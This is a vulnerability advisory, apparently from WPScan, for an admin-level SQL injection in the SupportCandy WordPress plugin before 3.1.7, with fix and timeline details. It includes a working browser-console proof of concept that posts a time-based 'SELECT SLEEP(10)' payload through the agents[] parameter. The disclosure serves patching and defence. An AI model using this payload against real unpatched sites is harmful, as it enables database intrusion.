WordPress Plugin Vulnerabilities
SupportCandy < 3.1.7 - Admin+ SQLi
Description
The plugin does not properly sanitise and escape the agents[] parameter in the set_add_agent_leaves AJAX function before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.
Proof of Concept
1. As an admin user, go to Support > Support Agents > Leaves. Click on a date in the calendar to open the "Add new" modal.
2. Run the following code in the browser console and note that response is delayed by 10 seconds:
await fetch("https://wpscan-vulnerability-test-bench.ddev.site/wp-admin/admin-ajax.php", {
"credentials": "include",
"headers": {
"Content-Type": "multipart/form-data; boundary=---------------------------400140094426688388811654736371",
},
"body": `-----------------------------400140094426688388811654736371\r\nContent-Disposition: form-data; name=\"agents[]\"\r\n\r\nSELECT SLEEP(10)\r\n-----------------------------400140094426688388811654736371\r\nContent-Disposition: form-data; name=\"is-recurring\"\r\n\r\n0\r\n-----------------------------400140094426688388811654736371\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nwpsc_set_add_agent_leaves\r\n-----------------------------400140094426688388811654736371\r\nContent-Disposition: form-data; name=\"_ajax_nonce\"\r\n\r\n${document.getElementsByName('_ajax_nonce')[0].value }\r\n-----------------------------400140094426688388811654736371\r\nContent-Disposition: form-data; name=\"dateSelected\"\r\n\r\n2023-05-16\r\n-----------------------------400140094426688388811654736371--\r\n`,
"method": "POST",
});
Affects Plugins
Fixed in 3.1.7 References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
dc11
Submitter
dc11
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-05-22 (about 11 months ago)
Added
2023-05-24 (about 11 months ago)
Last Updated
2023-05-24 (about 11 months ago)
WPScan 